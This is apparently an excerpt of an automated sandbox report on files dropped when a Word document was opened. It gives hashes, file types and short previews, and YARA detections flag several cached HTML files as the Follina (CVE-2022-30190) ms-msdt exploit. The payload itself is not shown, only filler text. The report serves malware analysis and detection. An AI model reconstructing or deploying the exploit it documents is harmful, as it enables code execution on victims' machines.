                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-07T16:43:58">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3646D980.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3646D980.htm, Author: Joe Security
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F08FB8E.htm, Author: Joe Security
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1024
                                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2130
                                                                                                                                                                      Entropy (8bit):1.1618571236537212
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRnyOLfEznRnyOLflqDmPm1SXV5:mbb2sOhYk5vnZA5Rn/YnRn/doQ5
                                                                                                                                                                      MD5:4F8C0EAC84D2D1AEEDABF24EF834DEFF
                                                                                                                                                                      SHA1:7B75446CBB512AD6C13F12A35948E1548FD62864
                                                                                                                                                                      SHA-256:8FB6FE075C6777639474427C864A13E5EAB1ECF7016DD1C23B9CA8FA7A7D0188
                                                                                                                                                                      SHA-512:83839667E41A748A703F80D0CE533F37922433973EFC0949D34D2B3E7FFC8548A04682D97A1457CB7E92C667541EBB2BED0432A59084558A4BBE5E1CE8567494
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:....S.H.A.P.E. .X. .\.*. .M.E.R.G.E.F.O.R.M.A.T... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...2...6...D...F...D...F...J...N...P.............................................................................................................................................................................................................................................................................................................................................................................................................................j....U....j....U...*....j....U
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, Author: Joe Security
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9728
                                                                                                                                                                      Entropy (8bit):4.795711592101823
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:bKqedmYoNKvUTCSH3gR8H8FgwSHwBCkwZYPaSJ365OhieMjQZaVRnIjBK:GElNK8TCSfHyPCkwZ+vKO6QZMnh
                                                                                                                                                                      MD5:2370A6D956344C1D6C8057FF7C159EEA
                                                                                                                                                                      SHA1:DDF008F0198B7F3B5B880F0B988EB0E0AB4B5C85
                                                                                                                                                                      SHA-256:DBE39CDBC6172275F0EE9357FFC6965D3C78962E48B10FBC408C6024C06BAA74
                                                                                                                                                                      SHA-512:DF077848EB72011531AE03F81A21BF67BC5090BC1CB13E61E9786FC84475EF277C5FBAD2952240E56A4A81C4C85C8425929675340D31EE2D9529D2C4989F7641
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                      Entropy (8bit):3.0899272142528944
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKYak7YnqqfNPN5Dlq5J:+RI+ycuZhNTakSlPNnqX
                                                                                                                                                                      MD5:DFD1C6CD195504FF8BED4DA1D4331733
                                                                                                                                                                      SHA1:3F8CE7D55F3BFBB74F88C3E484E74FBB98C4EFCE
                                                                                                                                                                      SHA-256:64C02655A808B579958C85845F6B5CC32D5DAC367C7CAE900F768E473FEDE8D3
                                                                                                                                                                      SHA-512:9CD30B6AF53ABAC19CE14696B76BBCBA25A99563AE8E344F27A58CA4EE830D0B44820C2F525F817B0C133BDD1FD187D2214B04B3D3099FEFD1619280AA0D1155
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                      Entropy (8bit):4.086982725229347
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:H+C9A++frfLDfHSHhKk1fII+ycuZhNTakSlPNnq9Wd:Mx7yBK0g1ulTa3/q9m
                                                                                                                                                                      MD5:3C5AE55453D17FE4C42EFF9E831D1C6A
                                                                                                                                                                      SHA1:3C38D9EC7E1BF8F33F7DE723EC94C6C4C4A9668B
                                                                                                                                                                      SHA-256:DAD0CE3F8124E585386B2722B176B8540B159ED46CD60377D20652AA398ED217
                                                                                                                                                                      SHA-512:859D881F4235A72973602A9972B059E89074FA252FD007E5E618AFC1405073CB02D0A62B85483D0DF17D8A4A54EFD9130AE6669211DDF3BFC4CDFF38BD3BC492
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                      Entropy (8bit):4.093587464240449
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:HyC9A++fkZIeDfHPPYhKk1fII+ycuZhNGaakSBrPNnq9Wd:wxkaEqK0g1ulGaa3BBq9m
                                                                                                                                                                      MD5:8E55579AB07AEB8F2CC6172BE73EB95B
                                                                                                                                                                      SHA1:008DE38C2E255E37708CAB0AD03E9B292520F751
                                                                                                                                                                      SHA-256:9A8F5981B57A3B43777265A8CACA9AB49B1BDC6162588F96EC76A1198E31EAB9
                                                                                                                                                                      SHA-512:9CF131C5AA9F834900D5BE0B06CC1E1B21E5C9B0DC5542CE5EC851E47E14B3381B898B34350551CB866FB197DA9B9B596FB9FD154132CD1CEC002C21718CE7E6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                      Entropy (8bit):4.1081012220910935
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:HfC9A++fsfmJ0DfHJhKk1fII+ycuZhN9nYakSCnNPNnq9Wd:vxxJy3K0g1ul9Ya3CXq9m
                                                                                                                                                                      MD5:760251821DC82C945D9CC94A9D90AEDF
                                                                                                                                                                      SHA1:AEB848353B984F59A036AA42394EECB844E4AC4F
                                                                                                                                                                      SHA-256:21B8260318068179866061B496FFCC2B73764B14B91D68AE019216FF3D6EAFED
                                                                                                                                                                      SHA-512:7BBE4DD3F21CC548618D5B29BD8482F9905F119D59361A0181AD6777DD3BA3D6DC287E31F0FBDFE6C753A3778B8D14F4C8AA57FD8E1B84374792A025DC3BAF5E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                      Entropy (8bit):3.09487483477081
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry/nYak7YnqqCnNPN5Dlq5J:+RI+ycuZhN9nYakSCnNPNnqX
                                                                                                                                                                      MD5:112571ED3EF7085A2022F9EE3EE8BED5
                                                                                                                                                                      SHA1:EBB8FE3EF10CFD921500633C227D2EA2BFEB9BD9
                                                                                                                                                                      SHA-256:6392D62977025E8CA25BA00EF0AD53B526C862C36B53AFE05502ED144F0C51E2
                                                                                                                                                                      SHA-512:2965DC3B58501929DF53006C845D39E8E9BCB842D63D7DEFB609FEAB328F3323542593DAE181931AAC6378D5CC607568347D626B7C2CB2E376A2AB1FB9028B02
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3584
                                                                                                                                                                      Entropy (8bit):3.085609000092812
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:6Mpqb927GslPTDRjyJzUqk1ul9Ya3CXq:yc7GBngK
                                                                                                                                                                      MD5:ADB5E57D74F7163C69FDDD5E4C558B3E
                                                                                                                                                                      SHA1:9EE08CCEB0455D17703305B0B5D6F097B3ECF8F4
                                                                                                                                                                      SHA-256:2001B98EB83553A8E98D1F9D805E35D2142DF19797CC8F8DA3C022CE4703BAB2
                                                                                                                                                                      SHA-512:347C7FC03AB4AD52C10BB043BB6674AA5F78AAEA990CE3408A75FAADC4867ECA4941A23E6791553A42C7D39C98B6ABED5495EB96DC2DBD4DCBE173947A5665A0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):652
                                                                                                                                                                      Entropy (8bit):3.0847603083748942
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryYlaak7YnqqblrPN5Dlq5J:+RI+ycuZhNGaakSBrPNnqX
                                                                                                                                                                      MD5:1C1BF3AFED4F5BA8F10BCE345034B034
                                                                                                                                                                      SHA1:DDA7FB76DCE980761AB4556881C03C78A48D52B9
                                                                                                                                                                      SHA-256:AC5E922DC8E9C57B427F4ACAFEF0F4F0F28BD6171E74064A3073B772975723D3
                                                                                                                                                                      SHA-512:2327C8D53199C3983F1047D1BD7E99077B67596149739EEEA58BDD72C6072718E9DFFBA4F3D8628E4D7A859D2716C5EE46D93BE67D3C6BA35B0DCCAB35C79B45
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.s.m.b.0.b.c.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.s.m.b.0.b.c.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5120
                                                                                                                                                                      Entropy (8bit):3.782137158953932
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:6WoPhmKraYZkH8KTibUy9kwjj0JcC+CFSlwY/c1ulGaa3BBq:MDaAkHHonk8HCuHpK
                                                                                                                                                                      MD5:B48A80632C10E39F90AC036D98DF4ED5
                                                                                                                                                                      SHA1:D6FA61076E1CB021806E6E7595134AFD686A0EBC
                                                                                                                                                                      SHA-256:0142366EE911D20D14E1F07AED7D53D4658AD877A6FB23CD8AE09B103C8F5AC5
                                                                                                                                                                      SHA-512:9C87704F1215B09AEF89B5AEFD41F18BDBCCD56A744446218D45446FF66F035C430F82FE24DE21FB7EF06562559E6CC695A8FB0512C7DE4CFFFA5542D367626D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 08:43:10 2022, mtime=Tue Jun 7 15:44:09 2022, atime=Tue Jun 7 15:43:52 2022, length=10144, window=hide
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1040
                                                                                                                                                                      Entropy (8bit):4.709404002328391
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:8lu4mpRUJpduCH2+CgSqD4yVAJuSc5A+WnvZDFLmAjAV/D0lHm2NDHfi44t2Y+x4:8luJeXFSqr8rc5iNAVbQD57aB6m
                                                                                                                                                                      MD5:DB80B5F0A185E185CB8D8DC0EAFAACC2
                                                                                                                                                                      SHA1:9BC60C42D61BB923DEB4E0C687B0688382CF699C
                                                                                                                                                                      SHA-256:A582A9A48E44D2D8F93DCE977D213BC05891B39ACF6D3D22948E50BCA9646D5C
                                                                                                                                                                      SHA-512:477139D5680F860D05C2E7A633307833B7AF9898C312EAFF40B9AD50B12BABB4A835BDE4E04FA432FD8FA2C97334F4F4FD7E29C049A4D8F057DDFF2D8C56AB2E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:L..................F.... ...Ga#..2..,P..z..h.<.z...'...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Tr.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hTgM..user.<.......N...Tr.....#J....................b...j.o.n.e.s.....~.1.....hTkM..Desktop.h.......N...Tr......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2..'...T{. .DOC782~1.DOC..H......hTfM.T{......V.....................p..d.o.c.7.8.2...d.o.c.x.......Q...............-.......P...........>.S......C:\Users\user\Desktop\doc782.docx..".....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.7.8.2...d.o.c.x.........:..,.LB.)...As...`.......X.......965543...........!a..%.H.VZAj....'$.............!a..%.H.VZAj....'$........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x..
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):4.601202445739505
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:bDuMJlZIbFXCmxWKIbFXCv:bCSa6c
                                                                                                                                                                      MD5:538F5016C24249AC1799BBBB20B4BD97
                                                                                                                                                                      SHA1:1B0ECD98E7D3BFECA78B00528138FA8D84F35BED
                                                                                                                                                                      SHA-256:249CC3AF3819FB4142D7A65254BD454ACF580489E19A50D71007A7E998B4A70F
                                                                                                                                                                      SHA-512:E0E8040389BABFFD046E57AAD3ECFEE9A9171B4D00EC75EE3DF48710FC452C479692121776D17DCBCCC72E4A1CA0B6570484C007B282C9DBF05EDD34C9463EDA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:[folders]..Templates.LNK=0..doc782.LNK=0..[misc]..doc782.LNK=0..
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):162
                                                                                                                                                                      Entropy (8bit):2.183415143652617
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Rl/Zde8FxlqKT2k3ll//olF883nl1Z:RtZWI2kVWF
                                                                                                                                                                      MD5:F7D5777AA9278B2A2C2AE07E96521B27
                                                                                                                                                                      SHA1:AAF2BC43AA48170626C2808D24E763C51F5F53F8
                                                                                                                                                                      SHA-256:E60F7AAEAED18B9A530A2D3333F621D427C071EE7DB6C2670BC131583E9CCEA0
                                                                                                                                                                      SHA-512:E27638644E0E69ADB7D4D13DF3AF49641C995B22AC69F2B614B0CBF5A29CA81C1560FAFA2E4C4062155F36E20DD9E5EFFACAF277A56FEA86F1A05DE23CF6A332
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h..............&..........H.......6C...........'...............................(..............
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20
                                                                                                                                                                      Entropy (8bit):2.8954618442383215
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                      MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                      SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                      SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                      SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:..p.r.a.t.e.s.h.....
